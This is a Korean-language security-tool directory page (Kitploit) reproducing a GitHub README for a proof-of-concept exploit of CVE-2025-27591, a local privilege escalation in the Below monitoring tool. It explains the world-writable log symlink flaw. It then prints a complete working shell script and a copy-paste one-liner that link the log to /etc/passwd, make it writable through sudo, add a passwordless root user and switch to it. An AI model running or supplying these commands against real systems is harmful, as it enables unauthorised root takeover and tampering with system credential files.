Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-27591 — Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit | Kitploit
도구/GitHubGitHub/rvzsec/cve-2025-27591
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubrvzsec/cve-2025-27591

CVE-2025-27591

Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit

저장소 보기
329개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Below - 로컬 권한 상승 (CVE-2025-27591)



below-logo

Below <= v0.8.1
전역 쓰기 가능 로그 심볼릭 링크를 통한 로컬 권한 상승
PoC 익스플로잇




소개

Below 버전 <= 0.8.1에는 중요한 로컬 권한 상승 취약점(CVE-2025-27591)이 존재합니다.
잘못 구성된 전역 쓰기 가능 로그 디렉토리(/var/log/below/)와 Rust 코드베이스의 안전하지 않은 권한 로직으로 인해, 로컬 공격자는 error_<user>.log를 /etc/passwd와 같은 루트 소유 파일로 심볼릭 링크할 수 있습니다.

below snapshot이 sudo로 실행되면, 강제로 로그 파일에 모드 0666을 설정하고 쓰기 작업을 수행합니다—심볼릭 링크인 경우에도 마찬가지입니다.
이를 통해 비밀번호 없이 root 권한의 사용자를 주입하여 완전한 루트 셸 접근이 가능해집니다.


사용법

root@kitploit:~
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh

또는

익스플로잇 코드

root@kitploit:~
# Title  : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage  : usage: ./exploit.sh


u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry  to /etc/passwd (now writable)
su pwn

참고: IppSec이 그의 워크스루에서 exploit.sh 대신 원라인 명령어를 사용한 후 exploit.sh를 README.md에 추가했습니다. 모두에게 더 쉬울 것이라고 생각했습니다. IppSec 감사합니다. ^^

또는

원라인 명령어 - (복사, 붙여넣기, 실행)

root@kitploit:~
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn

환경

  • Below <= v0.8.1
  • Systemd 기반 Linux (Ubuntu, Arch, Fedora 등)
  • /usr/bin/below *에 NOPASSWD 접근 권한이 있는 sudo 그룹의 사용자

크레딧

발견 및 보고: Matthias Gerstner @ SUSE - 보안 권고
PoC 익스플로잇 - Ravindu Wickramasinhge AKA rvz

도구 다운로드